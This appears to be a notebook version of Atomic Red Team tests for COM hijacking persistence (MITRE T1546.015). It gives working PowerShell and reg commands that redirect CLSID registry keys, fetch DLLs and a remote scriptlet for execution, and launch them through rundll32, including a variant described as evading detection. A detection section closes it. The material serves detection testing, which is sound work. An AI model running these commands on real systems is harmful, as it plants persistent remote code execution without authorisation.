# T1546.015 - Event Triggered Execution: Component Object Model Hijacking
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. 

## Atomic Tests

### Atomic Test #1 - COM Hijacking - InprocServer32
This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.

Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: DLL For testing
##### Check Prereq Commands:
```powershell
if (Test-Path $env:TEMP\AtomicTest.dll) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "$env:TEMP\AtomicTest.dll"
```

In [ ]:
Invoke-AtomicTest T1546.015 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value 'MSAA AccPropServices'
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InprocServer32' -Value $env:TEMP\AtomicTest.dll
New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InprocServer32' -Name 'ThreadingModel' -Value 'Apartment' -PropertyType "String"
Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'```

In [ ]:
Invoke-AtomicTest T1546.015 -TestNumbers 1

### Atomic Test #2 - Powershell Execute COM Object
Use the PowerShell to execute COM CLSID object.
Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $o.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
```

In [ ]:
Invoke-AtomicTest T1546.015 -TestNumbers 2

### Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)
This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via "rundll32.exe -localserver [clsid]". 
This method is generally used as an alternative to 'rundll32.exe -sta [clsid]' to execute dll's while evading detection. 
Reference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/
Upon successful execution of this test with the default options, whenever certain apps are opened (for example, Notepad), a calculator window will also be opened. 
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: DLL For testing
##### Check Prereq Commands:
```powershell
if (Test-Path $env:temp\T1546.015_calc.dll) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll" -OutFile "$env:temp\T1546.015_calc.dll"
```

In [ ]:
Invoke-AtomicTest T1546.015 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value 'MSAA AccPropServices'
New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InprocServer32' -Value $env:temp\T1546.015_calc.dll
New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InprocServer32' -Name 'ThreadingModel' -Value 'Both' -PropertyType "String"
Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-localserver {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'```

In [ ]:
Invoke-AtomicTest T1546.015 -TestNumbers 3

### Atomic Test #4 - COM hijacking via TreatAs
This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.

References:

https://youtu.be/3gz1QmiMhss?t=1251

https://github.com/enigma0x3/windows-operating-system-archaeology
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\WINDOWS\system32\scrobj.dll" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f

reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f

rundll32.exe -sta "AtomicTest" ```

In [ ]:
Invoke-AtomicTest T1546.015 -TestNumbers 4

## Detection
There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  

Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. 